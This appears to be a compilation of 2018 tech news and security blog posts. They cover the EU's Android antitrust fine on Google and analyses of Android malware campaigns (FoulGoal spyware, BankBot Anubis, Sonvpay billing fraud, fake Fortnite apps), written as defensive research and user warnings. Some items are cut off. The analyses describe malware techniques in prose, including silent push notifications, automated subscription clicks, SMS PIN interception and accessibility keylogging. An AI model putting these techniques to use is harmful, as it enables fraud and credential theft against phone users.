EU slaps Google with record $5 billion fine in Android Antitrust Case

Google fined $5 billion fine for illegal restrictions on Android use

The European Union Commission on Wednesday imposed on Google a record $5 billion (4.34 billion euros) fine for illegally abusing the dominance of its Android operating system.

Margrethe Vestager, EU Antitrust Chief who is in charge of the competition policy, said that the U.S. tech giant has been unlawfully using Android’s near-monopoly since 2011 to improve usage of its own search engine and browser and to strengthen its dominant position in general Internet search.

“Today the commission has decided to fine Google 4.34 billion euros (USD 5 billion) for breaching EU antitrust rules,” Vestager told a press conference in Brussels. “Google has used Android as a vehicle to cement the dominance of its search engine. These practices have denied rivals the chance to innovate and compete on the merits. They have denied European consumers the benefits of effective competition in the important mobile sphere.”

Vestager said Google “must put an effective end to this conduct within 90 days or face penalty payments” of up to five percent of the worldwide average daily revenue of its parent company, Alphabet.

“Our case is about three types of restrictions that Google has imposed on Android device manufacturers and network operators to ensure that traffic on Android devices goes to the Google search engine,” said Vestager.

Particularly, Google required manufacturers to pre-install the Google Search app and browser app (Chrome), as a condition for licensing Google’s app store (the Play Store).

The search giant ultimately gave “financial incentives” to manufacturers and mobile network operators, if they exclusively pre-installed the Google Search app on their devices, the commission said.

The Commission also found that Google used the so-called anti-fragmentation agreements to stop phone makers from selling modified versions of Android.

Google said it would be appealing against the fine imposed by EU. “Android has created more choice for everyone, not less. A vibrant ecosystem, rapid innovation, and lower prices are classic hallmarks of robust competition. We will appeal the Commission’s decision,” a Google spokesperson said in a statement.

This statement was backed by Google’s CEO Sundar Pichai on Twitter, who said that Android’s existence has led to robust competition in a blog post on the subject.

It would be interesting to see how does the EU’s decision affect Google’s advertising business, as well as mobile phone manufacturers and app developers.

The post EU slaps Google with record $5 billion fine in Android Antitrust Case appeared first on TechWorm.

Project ‘Fuchsia’: Google is Quietly Working on a Successor To Android

A day after the European Commission fined Google over Android, more details about Fuchsia, a new operating system the company has been working on for several years has emerged. From the report: But members of the Fuchsia team have discussed a grander plan that is being reported here for the first time: Creating a single operating system capable of running all the company's in-house gadgets, like Pixel phones and smart speakers, as well as third-party devices that now rely on Android and another system called Chrome OS, according to people familiar with the conversations. According to one of the people, engineers have said they want to embed Fuchsia on connected home devices, such as voice-controlled speakers, within three years, then move on to larger machines such as laptops. Ultimately the team aspires to swap in their system for Android, the software that powers more than three quarters of the world's smartphones, said the people, who asked not to be identified discussing internal matters. The aim is for this to happen in the next half decade, one person said. But Pichai and Hiroshi Lockheimer, his deputy who runs Android and Chrome, have yet to sign off on any road map for Fuchsia, these people said. The executives have to move gingerly on any plan to overhaul Android because the software supports dozens of hardware partners, thousands of developers -- and billions of mobile-ad dollars. [...] Still, Fuchsia is more than a basement skunkworks effort. Pichai has voiced his support for the project internally, said people familiar with the effort. Fuchsia now has more than 100 people working on it, including venerated software staff such as Matias Duarte, a design executive who led several pioneering projects at Google and elsewhere. Duarte is only working part-time on the project, said one person familiar with the company.

Read more of this story at Slashdot.

Automated money-laundering scheme found in free-to-play games

The scammers automatically created iOS accounts with valid email accounts, then automatically used stolen cards to buy and resell stuff.

Google Warns Android Might Not Remain Free Because of EU Decision

An anonymous reader quotes a report from The Verge: The EU's decision to force Google to unbundle its Chrome and search apps from Android may have some implications for the future of Android's free business model. In a blog post defending Google's decision to bundle search and Chrome apps on Android, Google CEO Sundar Pichai outlines the company's response to the EU's $5 billion fine. Pichai highlights the fact a typical Android user will "install around 50 apps themselves" and can easily remove preinstalled apps. But if Google is prevented from bundling its own apps, that will upset the Android ecosystem. "If phone makers and mobile network operators couldn't include our apps on their wide range of devices, it would upset the balance of the Android ecosystem," explains Pichai, carefully avoiding the fact that phone makers will no longer be forced to bundle these apps but can still choose to do so. Pichai then hints that the free Android business model has relied on this app bundling. "So far, the Android business model has meant that we haven't had to charge phone makers for our technology, or depend on a tightly controlled distribution model," says Pichai. "But we are concerned that today's decision will upset the careful balance that we have struck with Android, and that it sends a troubling signal in favor of proprietary systems over open platforms." While it may be a bluff to court popular opinion, Google is threatening to license Android to phone makers. "[I]f phone makers can bundle their own browsers instead of Chrome and point search queries toward rivals, then that could have implications for Google's mobile ad revenue, which constitutes more than 50 percent of the company's net digital ad revenue," reports The Verge.

Read more of this story at Slashdot.

EU Fines Google Record $5 Billion in Android Antitrust Case

Google has been hit by a record-breaking $5 billion antitrust fine by the European Union regulators for abusing the dominance of its Android mobile operating system and thwarting competitors. That's the largest ever antitrust penalty. Though Android is an open-source and free operating system, device manufacturers still have to obtain a license, with certain conditions, from Google to

Samsung’s Galaxy S10 To Come In Three Sizes, With An In-Display Fingerprint Sensor

Analyst Ming-Chi Kuo says Samsung will launch the Galaxy S10 in three different sizes: 5.8 inches, 6.1 inches, and 6.4 inches. They are nearly the same sizes that Kuo expects Apple's next series of iPhones to come in. The Verge reports: The larger two S10 models will include in-display fingerprint sensors, Kuo says, while the smaller model will include a fingerprint sensor on the side. That suggests the smaller model will be Samsung's entry-level offering, while the larger two will potentially have higher-end specs and features. Another recent rumor says the S10 might include five cameras, adding an additional wide angle option to the back and another lens to the front for capturing portrait effects. It's very likely plans will change between now and when the Galaxy S10 launches, which should be early next year. The next flagship smartphone to come from the South Korean company will be the Galaxy Note 9. It's expected to make its appearance at an event on August 9th.

Read more of this story at Slashdot.

Google Play Users Risk a Yellow Card With Android/FoulGoal.A

English soccer fans have enthusiastically enjoyed the team’s current run in the World Cup, as the tune “Three Lions” plays in their heads, while hoping to end 52 years of hurt. Meanwhile a recent spyware campaign distributed on Google Play has hurt fans of the beautiful game for some time. Using major events as social engineering is nothing new, as phishing emails have often taken advantage of disasters and sporting events to lure victims.

“Golden Cup” is the malicious app that installs spyware on victims’ devices. It was distributed via Google Play, and “offered” the opportunity to stream games and search for records from the current and past World Cups. McAfee Mobile Security identifies this threat as Android/FoulGoal.A; Google has removed the malicious applications from Google Play.

Once Golden Cup is installed it appears to be a typical sporting app, with multimedia content and general information about the event. Most of this data comes from a web service without malicious activity. However, in the background and without user consent the app silently transfers information to another server.

Data captured

Golden Cup captures a considerable amount of encrypted data from the victim’s device:

  • Phone number
  • Installed packages
  • Device model, manufacturer, serial number
  • Available internal storage capacity
  • Device ID
  • Android version

This spyware may be just the first stage of a greater infection due to its capability to load dex files from remote sources. The app connects to its control server and tries to download, unzip, and decrypt a second stage.

Android/FoulGoal.A detects when the screen is on or off and records this in its internal file scrn.txt, with the strings “on” or “off” to track when users are looking at their screens:

The Message Queuing Telemetry Transport protocol serves as the communication channel between the device and the malicious server to send and receive commands.

Data encryption

User data is encrypted with AES before it is sent to the control server. Cryptor class provides the encryption and decryption functionality. The doCrypto function is defined as a common function. As the first parameter of the function, “1” represents encryption and “2” is decryption mode:

The encryption key is generated dynamically using the SecureRandom function, which generates a unique value on the device to obfuscate the data. The addKey function embeds the encryption key into the encryption data. The data with the key is uploaded to the control server.

We believe the malware author uses this AES encryption technique for any information to be uploaded to escape the detection by Google Bouncer and network inspection products.

Our initial analysis suggests there were at least 300 infections, which we suspect occurred between June 8‒12, before the first World Cup matches began.

The second round

The second phase of the attack leverages an encrypted dex file. The file has a .data extension and is downloaded and dynamically loaded by the first-stage malware; it is extracted with the same mechanism used to upload the encrypted files. The location of the decryption key can be identified from the size of the contents and a fixed number in the first-stage malware.

After decryption, we can see out.dex in zipped format. The dex file has spy functions to steal SMS messages, contacts, multimedia files, and device location from infected devices.

The control server in second stage is different from the first stage’s. The encryption methodology and the server folder structures on the remote server are identical to the first stage.

We found one victim’s GPS location information and recorded audio files (.3gp) among the encrypted data on the control server.


We have also discovered two other variants of this threat created by the same authors and published to Google Play as dating apps. Although all the apps have been removed from Google Play, we still see indications of infections from our telemetry data, so we know these apps are active on some users’ devices.

Our telemetry data indicates that although users around the world have downloaded the app, the majority of downloads took place in the Middle East, most likely as a result of a World Cup–themed Twitter post in Hebrew directing people to download the app for a breakdown of the latest events.

McAfee Mobile Security users are protected against all the variants of this threat, detected as   Android/FoulGoal.A.

The post Google Play Users Risk a Yellow Card With Android/FoulGoal.A appeared first on McAfee Blogs.

Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores

IBM X-Force mobile malware researchers have observed several developers actively uploading Android malware downloaders to the Google Play Store.

Following ongoing campaigns against Google Play, our research team has been monitoring banking malware activity in official app stores. The team recently reported that downloader apps in the store are being used as the first step in an infection routine that fetches the Marcher (aka Marcher ExoBot) and BankBot Anubis mobile banking Trojans. Users who unknowingly install the app on their devices are subsequently infected. Cybercriminals use these banking Trojans to facilitate financial fraud by stealing login credentials to banking apps, e-wallets and payment cards.

Starting in June, our team discovered a number of new malware downloader samples that infect users with BankBot Anubis (aka Go_P00t). The campaign features at least 10 malicious downloaders disguised as various applications, all of which fetch mobile banking Trojans that run on Android-based devices. While the number of downloaders may seem modest, each of those apps can fetch more than 1,000 samples from the criminal’s command-and-control (C&C) servers.

Finding new downloaders in the app store in connection with the BankBot Anubis malware could suggest that:

  • A given malware distributor/cybercrime faction has shifted from using Marcher to distributing BankBot Anubis; or
  • The threat actors distributing the malware on Google Play are offering their “expertise” as a service, spreading malware downloaders for different cybercrime factions that use mobile Trojans to facilitate financial fraud — aka “downloader-as-a-service.”

Such cybercrime services are common in the fraud and malware black markets. They entail a proven ability to infiltrate Google Play and plant malicious downloaders under the guise of benign-looking apps. These services can likely maintain the downloader’s C&C servers long enough to generate a steady stream of new infections, suggesting the thought-out operational security and know-how characteristic of organized cybercrime groups.

Read the white paper: Worried about mobile security? You should be

An Era of Mobile Malware Downloaders

As app store operators layer security to stymie the efforts of malicious developers, black-hat app distributors find ways to sidestep them. To circumvent ever-evolving app store defenses, mobile malware distributors rely on a strategy from the PC malware realms: Instead of uploading the actual malware to the store, which can result in sampling and detection at a very early stage in the distribution chain, they upload a downloader that may seem rather innocuous compared to actual malware.

In general, a downloader app is more likely to survive security checks and recurring scans, and once it lands on a user’s device, it can fetch the intended malware app. As the Chinese general Sun Tzu wrote in “The Art of War,” “The greatest victory is that which requires no battle.”

Sample Downloader Campaign From Current Analyses

In the current campaign, according to X-Force researchers, the downloader apps target Turkish-speaking users. They differ in type and visual style — from online shopping to financial services and even an automotive app — and are designed to look legitimate and enticing to users.

IBM X-Force Research IBM X-Force Research

IBM X-Force Research

Figure 1: Examples of malware downloader apps found on Google Play.

The variety of apps and styles indicates a large investment of resources on the part of the campaign’s operators, suggesting that a cybercrime service, rather than a single cybercrime faction, is likely responsible.

The downloaders themselves are rather stealthy, and VirusTotal missed all but one of the samples. The one that was found had zero detections by antivirus engines.

IBM X-Force Research

Figure 2: No detection rates on malicious downloaders.

In this campaign, the malicious downloader apps X-Force detected have the same code base as three apps that ThreatFabric reported in January 2018. The following characteristics show the similarity:

IBM X-Force Research

Figure 3: Code from sample downloader reported by ThreatFabric in January 2018.

IBM X-Force Research

Figure 4: Code from sample downloader discovered by X-Force in June 2018.

The resemblance is even more striking in the figure below. By removing all the key instances (**pE2**) from the string, we produced the same string from the January sample:

IBM X-Force Research

Figure 5: The code bases are very similar, suggesting that the same developer produced both apps.

With 10 downloaders at this point, the campaign appears to be scaling up.

Over time, we’ve seen the code evolve. As time went by between downloader versions, the developers added a simple obfuscation and expanded the downloader capabilities. The code was also altered slightly to avoid detection by Google Play’s security controls.

According to X-Force’s analysis, these changes suggest that the downloader app is being maintained on an ongoing basis — another sign that it is a commodity offered to cybercriminals or a specific group that’s focused on defrauding Turkish mobile banking users.

Anubis Masquerades as Google Protect

After a successful installation of the malicious downloader, the app fetches BankBot Anubis from one of its C&C servers. The BankBot Anubis malware then masquerades as an app called “Google Protect” and prompts the user to grant it accessibility rights.

BankBot Anubis Android malware app

Figure 6: Apps name in Turkish

IBM X-Force Research IBM X-Force Research

Figure 7: Malware asking for accessibility to keylog user credentials.

Why ask for accessibility? BankBot Anubis uses Android’s Accessibility services to perform keylogging as a way to obtain the infected user’s credentials when he or she accesses a targeted mobile banking app. In most Android banking Trojans, the malware launches a fake overlay screen when the user accesses a target app. The user then taps his or her account credentials into the fake overlay, which allows the malware to steal the data. BankBot Anubis streamlines this process.

By keylogging the user’s login information, the attacker can steal credentials from any app while avoiding the need to create custom overlays for each target. This malware is also able to take screen captures of the user’s screen, which it likely uses to steal credentials since the keyboard strokes are visible. These features are staples of PC banking malware and are evolving in Android malware as well.

The downloader apps in this particular campaign were designed to address Turkish users. With different botnets and configurations, BankBot Anubis itself also targets users in the following countries:

  • Australia
  • Austria
  • Azerbaijan
  • Belarus
  • Brazil
  • Canada
  • China
  • Czech Republic
  • France
  • Georgia
  • Germany
  • Hong Kong
  • India
  • Ireland
  • Israel
  • Japan
  • Kazakhstan
  • Luxembourg
  • Morocco
  • Netherlands
  • New Zealand
  • Oman
  • Poland
  • Russia
  • Scotland
  • Slovakia
  • Spain
  • Taiwan
  • Turkey
  • U.K.
  • U.S.

While there were 10 downloader apps in the Google Play Store at the time of this writing, the campaign is rather hefty. X-Force estimated the magnitude of campaigns on Google Play by the number of downloads, as well as the number and variety of payloads found. In one case, the researchers fetched more than 1,000 new samples of BankBot Anubis from just one C&C server. Each sample has a different MD5 signature, few of which were documented by any antivirus engine when tested against VirusTotal.

Official App Stores: A Fraudster’s Holy Grail

When it comes to maximizing the results of infection campaigns, mobile malware operators consider official app stores to be the holy grail. Getting a malicious app into an official store yields greater exposure to more potential victims, a cheap distribution channel and user trust. Moreover, malware apps that have already made it into an official store are more likely to fly under the radar of security controls for longer than those hosted on hijacked sites or rogue servers. IBM X-Force reports malicious apps to the official stores to have them removed before more users can be affected.

Malicious apps are a blight that both store operators and developers work hard to limit. Still, it is a recurring problem: In 2017, X-Force mobile researchers reported numerous occasions on which financial malware had sneaked into the Google Play Store, with the BankBot Android malware family leading the pack. The trend continues to escalate.

X-Force researchers suspect that the cybercrime services spreading mobile Trojans have mastered it as a malware campaign channel and may be monetizing it. While such cybercrime services are rather popular with PC malware distributors, its rise in the mobile malware realm is an escalating risk factor users and organizations should be aware of.

To learn more about keeping devices safe from mobile malware, read our mobile malware mitigation tips.

Read the white paper: Worried about mobile security? You should be

The post Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores appeared first on Security Intelligence.

Android Users Hit With Mobile Billing Fraud Due to Sonvpay Malware

Ever hear “Despacito” on the radio? Of course you did! It was the song of 2017 – taking over radios, dance clubs, and even ringtones on our cell phones. Take Android users for instance – many even downloaded the “Despacito for Ringtone” so they could enjoy the tune anytime they received a phone call. But what they didn’t know is that they could be involved in a cyberattack, rather than just listening to their favorite song. As a matter of fact, our McAfee Mobile Research team has found a new malicious campaign, named Sonvpay, that’s impacted at least 15 apps published on Google Play – including that Despacito app.

How it works

You know how with some of your apps you can adjust the push notifications? Sometimes these notifications pop up on your screen, and other times you won’t receive any – depending on your settings. To enact its malicious scheme, Sonvpay listens for incoming push notifications that contain the data they need in order to perform mobile billing fraud – which is when extra charges get added to a user’s phone bill and can potentially line a cybercriminal’s pocket.

Once receiving the data, the crooks can perform this mobile billing fraud (either WAP and SMS fraud) by displaying a fake update notification to the user. This fake notification has only one red flag – if the user scrolls until the end, the phrase “Click Skip is to agree” appears, as seen below.

If the user clicks the only button (Skip), Sonvpay will complete its mission – and will fraudulently subscribe the user to a WAP or SMS billing service, depending on the victim’s country.

What it affects

So which Android applications contain Sonvpay? The McAfee Mobile Research team initially found that Qrcode Scanner, Cut Ringtones 2018, and Despacito Ringtone were carrying the Sonvpay, and Google promptly took them down once notified. But then more emerged, totaling up to 15 applications out there that contain Sonvpay, some of which have been installed over 50,000 times. These applications include:


Cut Ringtones 2018


Qrcode Scanner

QRCodeBar Scanner APK

Despacito Ringtone

Let me love you ringtone

Beauty camera-Photo editor


Night light


Shape of you ringtone

Despacito for Ringtone

Iphone Ringtone


So now the next question is – what do I do if I was one of the Android users who downloaded an application with Sonvpay? How can I avoid becoming a victim of this scam? Start by following these tips:

  • Only give your apps permission to what they need. When downloading one of these applications, one user reported they noticed that the app asked for access to SMS messages. This should’ve been a red flag – why would a ringtone app need access to your texts? Whenever you download an app, always double check what it’s requesting access to, and only provide access to areas it absolutely needs in order to provide its service.
  • Always read the fine print. Before you update or download anything, always make sure you scroll through all the information provided and read through it line by line. This may feel tedious, but it could be the difference between being compromised and remaining secure.
  • Use a mobile security solution. As schemes like Sonvpay continue to impact mobile applications and users, make sure your devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Android Users Hit With Mobile Billing Fraud Due to Sonvpay Malware appeared first on McAfee Blogs.

AsiaHitGroup Returns With New Billing-Fraud Campaign

Are you tired yet of the music track “Despacito”? If you downloaded this ringtone app from Google Play, chances are your answer is a resounding Yes. But it gets worse: The McAfee Mobile Research team recently found 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. The ringtone app was one of them—downloaded 50,000 times from the official app store—that were designed to steal money from their victims. The AsiaHitGroup Gang has been active since at least 2016, attempting to charge 20,000 victims for the download of popular mobile applications containing the fake-installer app Sonvpay.A. For more analysis, see the Mobile Research team’s post.

Ordinarily we advise users to review the requested permissions before installing a mobile app, and normally this is enough. In this case, the only permission requested was access to SMS messages, and once installed the app behaved as expected. In the background, however, Sonvpay silently used the push notification service to subscribe users to premium-rate services.

This campaign displays a significant level of customization. The criminals can tailor their fraud to the country of their choosing. In our analysis we looked at mobile billing fraud targeting users in Kazakhstan, Malaysia, and Russia. In Kazakhstan victims are subscribed to a premium-rate service whereas in Malaysia and Russia they are connected to a WAP billing service. Further, the criminals recognize that in Malaysia the mobile operator sends a PIN code, so the attackers include functionality to intercept the SMS. Once intercepted, the app communicates with the mobile operator to subscribe to the service.

This group began targeting users in Asia, but the move to Russia shows its increasing ambition. The goal of the AsiaHitGroup Gang remains the same, but the manner in which they attempt to achieve their ends differs per campaign, and their techniques are improving. Although the security industry focuses much attention on “loud” and destructive attacks, many campaigns quietly steal funds from unsuspecting victims or those who have little visibility into what is happening.

The post AsiaHitGroup Returns With New Billing-Fraud Campaign appeared first on McAfee Blogs.

AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play

The McAfee Mobile Research team has found a new billing-fraud campaign of at least 15 apps published in 2018 on Google Play. Toll fraud (which includes WAP billing fraud) is a leading category of potentially harmful apps on Google Play, according to the report Android Security 2017 Year in Review. This new campaign demonstrates that cybercriminals keep finding new ways to steal money from victims using apps on official stores such as Google Play.

The AsiaHitGroup Gang has been active since at least late 2016 with the distribution of the fake-installer applications Sonvpay.A, which attempted to charge at least 20,000 victims from primarily Thailand and Malaysia for the download of copies of popular applications. One year later, in November 2017, a new campaign was discovered on Google Play, Sonvpay.B, used IP address geolocation to confirm the country of the victim and added Russian victims to the WAP billing fraud to increase its potential to steal money from unsuspected users.

In January 2018, the AsiaHitGroup Gang returned to Google Play with the repackaged app, Sonvpay.C, which uses silent background push notifications to trigger a fake update dialog. When victims start the “update” they instead subscribe to a premium-rate service. The subscription operates primarily via WAP billing, which does not require sending SMS messages to premium-rate numbers. Instead it requires only that users employ the mobile network to access a specific website and automatically click on a button to initiate the subscription process. Based on the approximate number of installations from Google Play, the cost of the premium-service subscription, and the days that these apps were available, we estimate that the AsiaHitGroup Gang could have potentially earned between $60,500–$145,000 since January.

Sonvpay on Google Play

The McAfee Mobile Research team initially found the following applications repackaged with Sonvpay on Google Play, all of them published this year:

Figure 1. Sonvpay apps found on Google Play.

We notified Google about these apps on April 10 and they were promptly removed. A couple of days later the app “Despacito for Ringtone” was found again on the store and was quickly removed. In total we found 15 apps that were installed at least 50,000 times since the first one, Cut Ringtones 2018, was released on Google Play in January 2018. The following table lists the 15 malicious apps:

At the time of download, the only red flag that a user could notice is that the app needs access to SMS messages. Once installed and executed, the app behaves as expected (QR code reader, ring tones, etc.). However, in the background and without the user’s knowledge, Sonvpay listens for incoming push notifications that contain the data to perform mobile billing fraud.

Background Push Notification and Fake Update Screen

Sonvpay employs the onesignal push notification service to get the information to subscribe users to premium-rate services. To receive the data in the background without displaying a notification, Sonvpay implements the method “onNotificationProcessing” and returns “true” to make the notification silent:

Figure 2. Silent background notification.

The received data can perform WAP and SMS fraud along with information necessary to display a fake update notification to the user after some time of using the repackaged application. This fake notification has only one bogus button. If the user scrolls until the end, the misleading phrase “Click Skip is to agree” appears:

Figure 3. Fake update notification.

If the user clicks the only button, Sonvpay will do its job. However, even if there is no interaction with this window and the data in the push notification has the value “price” as empty, Sonvpay will proceed to subscribe to a premium-rate service:

Figure 4. Starting mobile billing fraud if “price” value is empty.

Downloading the Dynamic Payload from a Remote Server

One of the parameters obtained from the silent push notification is a URL to request the location of functionality to perform mobile billing fraud. Once the fake update notification is displayed, Sonvpay requests the download of the library from another remote server:

Figure 5. Sonvpay requesting library with additional functionality.

The new APK file is downloaded and stored in the path /sdcard/Android/<package_name>/cache/ so that it can be dynamically loaded and executed at runtime. The library we obtained for performing mobile billing fraud targeted only Kazakhstan and Malaysia but, because the library is present in a remote server and can be dynamically loaded, it can likely be updated at any time to target more countries or mobile operators.

WAP Billing and SMS Fraud

In the case of Kazakhstan, Sonvpay loads a specific URL delivered through the silent push notification and uses JavaScript to click on a button and on the element “activate” to fraudulently subscribe the user to a premium-rate service:

Figure 6. WAP billing fraud in Kazakhstan.

For Malaysia, the malware creates a new WebView to send the “Shortcode” and “Keyword” parameters to a specific URL to subscribe the user to a WAP billing service:

Figure 7. WAP billing fraud in Malaysia.

However, for Malaysia the app needs to intercept a confirmation code (PIN) sent by the mobile operator via SMS. Sonvpay has this SMS interception functionality implemented in the original repackaged application:

Figure 8. Processing an intercepted SMS message to get the confirmation PIN.

Once the PIN is obtained, it is sent to the mobile operator via a web request to automatically confirm the subscription. If the parameters for Kazakhstan or Malaysia do not match, Sonvpay still tries to perform mobile billing fraud by attempting to send an SMS message to a premium-rate number provided via the silent push notification:

Figure 9. Functionality to send an SMS message to a premium-rate number.

Closer Look to Previous Campaigns

While looking for patterns in the 2018 campaign, we found the app DJ Mixer–Music Mixer. As soon as this application executes, it checks if the device has an Internet connection. If the device is offline, the app shows the error message “You connect to internet to continue” and ends its execution. If the device is online, the app executes a web request to a specific URL:

Figure 10. Web request to the AsiaHitGroup Gang URL.

We learned the apps created by the developer SHINY Team 2017 were available on Google Play in September 2017; earlier Sonvpay variants were discovered in November 2017. The primary behavior of the two variants is almost the same—including the changing of the main icon and the app’s name to Download Manager to hide its presence from the user. However, with DJ Mixer, the geolocation of the IP address identifies the country of the infected device and aids the execution of the mobile billing fraud:

Figure 11. Using IP geolocation to target specific countries.

In this case only three countries are targeted via the geolocation service: Russia (RU), Thailand (TH), and Malaysia (MY). If the IP address of the infected devices is not from any of these countries, a dialog will claim the app is not active and that the user needs to uninstall and update to the latest version.

If the country is Thailand or Malaysia, the malicious app randomly selects a keyword to select an image to offer users premium-rate services. With Malaysia the image includes English text with terms of service and the button “Subscribe” to accept the randomly selected premium-rate service:

Figure 12. Screens displayed when the country of the IP address is Malaysia.

In the case of Thailand, the text is in Thai and includes a small version of terms of service along with instructions to unsubscribe and stop the charges:

Figure 13. Screens shown when the country of the IP address is Thailand.

Finally, with Russia no image is shown to the user. The app fraudulently charges the user via WAP billing while enabling 3G and disabling Wi-Fi:

Figure 14. Forcing the use of 3G to start WAP billing fraud.

We also found similar apps from late 2016 that performed SMS fraud by pretending to be legitimate popular applications and asking the user to pay for them. These are similar to text seen in the 2018 campaign as an update but labeled as Term of user:

Figure 15. Fake-installer behavior asking the user to pay for a popular legitimate app.

If the user clicks “No,” the app executes as expected. However, if the user clicks “Yes,” the app subscribes the user to a premium-rate service by sending an SMS message with a specific keyword to a short number. Next the mobile operator sends the device a PIN via SMS; the malware intercepts the PIN and returns it via web request to confirm the subscription.

Once the user is fraudulently subscribed to a premium-rate service to download a copy of a free app on official app stores, the malware shows the dialog “Downloading game…” and proceeds with the download of another APK stored on a third-party server. Although the APK file that we downloaded from the remote server is a copy of the legitimate popular app, the file can be changed at any point to deliver additional malware.

Unlike in previous campaigns, we did not find evidence that these fake-installer apps were distributed via Google Play. We believe that they were distributed via fake third-party markets from which users looking for popular apps are tricked into downloading APK files from unknown sources.  In June 2018 ESET and Sophos found a new version of this variant pretending to be the popular game Fortnite. The fake game was distributed via a YouTube video by asking the user to download the fake app from a specific URL. This recent campaign shows that the cybercriminals behind this threat are still active tricking users into installing these fake applications.

Connections Among Campaigns

All of these campaigns rely on billing-fraud apps targeting users in Southeast and Central Asia and offer some similarities in behavior such as the use of almost the same text and images to trick users into subscribing to premium-rate services. Other potential connections among the three campaigns suggest that all the apps are likely from the same actor group. For example, apps from all campaigns use the same string as debug log tag:

Figure 16. The “SonLv” string used as a log tag occurs in all campaigns.

There is also a notable similarity in package and classes names and in the use of a common framework (telpoo.frame) to perform typical tasks such as database, networking, and interface support:

Figure 17. Common package and classes names in all campaigns.

Finally, apps from the Google Play campaigns use the domain vilandsoft[.]com to check for updates. The same domain is also used by apps from the fake-installer campaign to deliver remote-execution commands, for example, action_sendsms:

Figure 18. A fake-installer app checking for the command action_sendsms.

The following timeline identifies the campaigns we have found from this group, strategies to trick users into installing the apps, distribution methods, main payload, and targeted countries:


Figure 19. A timeline of Sonvpay campaigns.


Sonvpay campaigns are one example of how cybercriminals like the AsiaHitGroup Gang constantly adapt their tactics to trick users into subscribing to premium-rate services and boosting their profits. The campaigns started in late 2016 with very simple fake installers that charged users for copies of popular apps. In late 2017, Google Play apps abused WAP-billing services and used IP address geolocation to target specific countries. In 2018, Google Play apps used silent background push notifications to trigger the display of a fake update message and to gather data for mobile billing fraud. We expect that cybercriminals will continue to develop and distribute new billing fraud campaigns to target more countries and affect more users around the world.

Cybercriminals always follow the money, and one of the most effective ways to steal money from users is via billing fraud. A victim will likely not notice a fraudulent charge, for example, until it appears on the mobile bill at the end of the month. Even when the payment is detected early, most of the time the charge is for a subscription rather than a one-time payment. Thus victims will need to find a way to unsubscribe from the premium-rate service, which may not be easy if the subscription occurred silently or if the app does not provide that information. Also, the fact that WAP-billing fraud does not require sending an SMS message to a premium-rate number makes it easier to commit. Cybercriminals need to only silently subscribe users by forcing them to load the WAP-billing service page and click on buttons. For these reasons we expect that mobile billing fraud will continue to target Android users.

McAfee Mobile Security detects this threat as Android/Sonvpay. To protect yourselves from this and similar threats, employ security software on your mobile devices, check user reviews for apps on Google Play, and do not accept or trust apps that ask for payment functionality via SMS messages as soon as the app is opened or without any interaction.

The post AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play appeared first on McAfee Blogs.

Heads Up Gamers! Fake Fortnite Android Apps Are Being Spread via YouTube Videos

Does the name “Fortnite” ring any bells? It should, because it’s probably the most popular video game in the world right now, garnering the attention of millions of fans and even a few celebrities. Oh, and a handful of cybercriminals as well. Despite the fact that the game is not yet available for Android, crooks are advertising “leaked” versions of Epic Games’ Fortnite — by releasing YouTube videos with fake links claiming to be Android versions of the game.

This scam begins with a user conducting a simple Google or YouTube search for “Download Fortnite for Android” or “How to install Fortnite on Android.” This search provides users with dozens of videos – some of which have millions of views – that claim they can show how to get the game on Android. From there, people are then directed to download one of the fake Fortnite apps.

These fake apps do a great job at seeming convincing, as many use the same images and loading screens found in the iOS app. They even play the game’s intro song and prompt users to log in – seems legitimate, right? But soon enough, the apps reveal their true colors.

The apps will ask a user to provide mobile verification, to which they’ll confirm and hit OK. Then, users get redirected to a site claiming to check if they’re a bot or not, which requires them to download another app and then click on a link that comes with the “unlock instructions” within that app. Once users hit “tap to install,” however, they’re only guided back to Google Play. Users can keep installing app after app and will never actually get to the actual Fortnite game.

Essentially, this means the cybercriminals are aiming to make money off of increased app downloads. This incident reminds us that online gaming has its risks, and Fortnite is no exception. Therefore, in order to stay protected from this scam and others like it, be sure to follow these tips:

  • Do your homework. Know your game – find out when and where it is available on different platforms. And if for some reason your research yields mixed results, check the game’s main page to confirm the answer.
  • Go straight to the source. It’s a good security rule of thumb for anything out there – do not download something unless you are getting it from the company’s home page. The most trusted source is the original one, so make sure you’re using the real deal. If you’re an Android user, it’s best to just wait for Epic Games’ version of Fortnite in order to avoid frauds.
  • Use comprehensive security. Whether you’re using the mobile iOS version of Fornite, or gaming on your computer, it’s important you lock down all your devices with an extra layer of security. To do just that, use a comprehensive solution such as McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Heads Up Gamers! Fake Fortnite Android Apps Are Being Spread via YouTube Videos appeared first on McAfee Blogs.

Fake Fortnite for Android links found on YouTube

The extremely popular video game Fortnite is coming to Android sometime this summer, and the fanbase is going wild. Not surprisingly, mobile malware developers are taking advantage. Already, there are several videos on YouTube with links claiming to be versions of Fortnite for Android, despite the fact the game has yet to be released on this platform.

Swati Khandelwal of The Hacker News highlights the emerging threat in her article, Epic Games Fortnite for Android–APK Downloads Leads to Malware. Taking it a step further, I grabbed some of these malicious apps and took them for a spin.

The source of infection

The apps are not located on the Google Play Store. Instead, people have found them by searching “How to install Fortnite on Android” or “Fortnite for Android” in Google, or stumbling across links in YouTube ads. From there, the apps can be downloaded.

My findings for the so-called Fortnite for Android app are that it’s a simple program that comes in two different package names (so far):



Simple, but malicious nonetheless

To make the app look legit, it starts with a realistic-looking icon. As a matter of fact, it’s so realistic that some may recognize it from the Apple iOS version. By stealing the icon directly from Apple, how could it not look real?

When opening the app, it displays the Epic Games logo to further trick users.

Next, once again stealing from iOS, a loading screen appears.

iOS stolen loading screen

iOS stolen loading screen

After the loading screen, it starts playing the Fortnite intro song and opens a screen that displays “New Updates,” the first indication something might be up.

By just clicking on the screen, it moves onto a different screen that makes more sense. It states that it’s “Logging In…” and looks very authentic (as well as very stolen).

